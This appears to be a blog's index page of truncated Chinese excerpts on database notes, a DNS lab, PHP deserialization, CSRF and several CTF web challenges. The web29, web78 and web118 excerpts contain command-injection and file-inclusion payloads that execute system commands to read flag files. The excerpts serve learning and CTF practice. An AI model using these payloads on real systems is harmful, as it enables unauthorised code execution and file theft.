12k 30 分钟

# 前言 本篇记录学习数据库的第三章,SQL(结构化查询语言)是关系数据的标准语言,也是一个通用的功能性极强的关系性数据库语言,虽然说是查询语言,但是其功能包括但不仅限于数据库数据查询,而是包含了数据库创建,数据库数据的插入,删除,修改和完整性安全性定义等一系列操作。 # SQL 概述 前面也有提到,SQL...
4k 10 分钟

# 前言 本篇主要用于记录正则表达式和 preg_match 函数的绕过 # preg_match 函数 这个函数可以用来进行字符串规则的匹配,这个函数也是在 ctf 中经常会遇到的一个函数 preg_match ( string $pattern , string $subject [, array &$matches )preg_match_all () - 执行一个全局正则表达式匹配 $pattern 是匹配规则 $subjec 是被匹配的字符串 $matches 提供一个存放匹配结果的数组 demo: <?php$a="hello...
6.2k 15 分钟

# web78 <?phpif(isset($_GET['file'])){ $file = $_GET['file']; include($file);}else{ highlight_file(__FILE__);}data: 从 PHP5.2.0 起,数据封装流就开始有效,用于数据流的读取。 如果传入的都是 PHP 代码,就会执行任意代码 ?file=data://text/plain,<?php system('tac...
1.4k 4 分钟

# 前言 谨以此篇记录一下 php://filter 在一些情况下的使用方法,主要是 php://filter 在 file_put_content 写文件时的一些方法,看到网上有很多师傅都有对这一块的文章,这里做一下记录和测试 # 什么是 php://filter 首先来看看官方文档中怎么解释这个伪协议 php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和 file_get_contents(),...
5.6k 14 分钟

# Billu_b0x 打靶记录 # 前言 说起来应该算是第一次打这样的靶机,虽然没有独立完成,但是还是学到不少东西,也不知道算是什么难度的反正是看着网上大佬的方法打通了 # 靶机说明 目标是获取 root 权限 环境介绍:攻击机 win10、kail Linux ​ 靶机 billu_b0x (运行与 VMware 中) 网络设置:VM 中均为 Nat 连接模式(否则 nmap 扫不到存活主机) # 过程记录 # 信息收集 启动靶机这不必多说 先用 nmap 扫描,找到这个靶机的 ip 地址 扫描这个网段存活主机 发现开放了 80 和 22 端口,那么 ssh 和 http...
904 2 分钟

# 实验 3:DNS 服务器配置 实验目的 1、了解 DNS 基本概念及域名解析过程; 2、熟悉常规 DNS 服务器的安装与配置; 3、掌握辅助 DNS 服务器的配置; 4、掌握 DNS 服务器配置过程中一般排错方法。 实验参考 实验步骤可参考《5-1 - 主 dns 服务器配置.pdf》文件。 实验步骤可参考《5-2 - 辅助 DNS 服务器配置.pdf》文件。 # 1. 实验要求 任务 1:主 DNS 服务器配置 任务 2:辅助 DNS 服务器配置 要求:域名为 xxx.co,其中 xxx 为姓名拼音拼写。 # 2. 实验过程 # 2.1 主 DNS 服务器配置 # 2.1.1...
10k 26 分钟

# 前言 php 文件在执行后对象对象会被销毁,但是这个对象很多情况下我们想要持续的使用,序列化就是这样一个过程,通过序列化我们可以将对象转化成字符串存到磁盘中长期保存 O:<length>:"<class name>":<n>:{<field name 1><field value 1>...<field name n><field value...
327 1 分钟

# web118 已经知道 flag 在 flag.php 中,想办法打开文件就行 这里将小写字母和数字都过滤了,使用 bash 的内置变量进行绕过 题目应该在 html 下面,可以拿到 l,PATH 结尾是 /bin 拿到 n 可以使用 nl 命令 ${PATH:~A}${PWD:~A}$IFS????.???//nl flag.php # web119 上面的 payload 用不了了,去 bin 下调用 cat 命令 ${SHLVL} //一般是一个个位数 $:$:$:$`...
26k 1:05

# web29 <?phperror_reporting(0);if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__);}?c=system('cat f?ag.php');?c=echo `cat...
4.8k 12 分钟

# CSRF 简介 CSRF 是指跨站请求伪造,跨站请求伪造(英语:Cross-site request forgery,也被称为 [one-click attack] 或者 [session riding],通常缩写为 CSRF 或者 XSRF,是一种挟制用户在当前已登录的 Web 应用程序上执行非本意的操作的攻击方法。跟跨网站脚本(XSS)相比,XSS 利用的是用户对指定网站的信任,CSRF 利用的是网站对用户网页浏览器的信任。 扯那么多,简单的理解就是盗用了用户的身份,以用户的名义进行非法操作 # CSRF...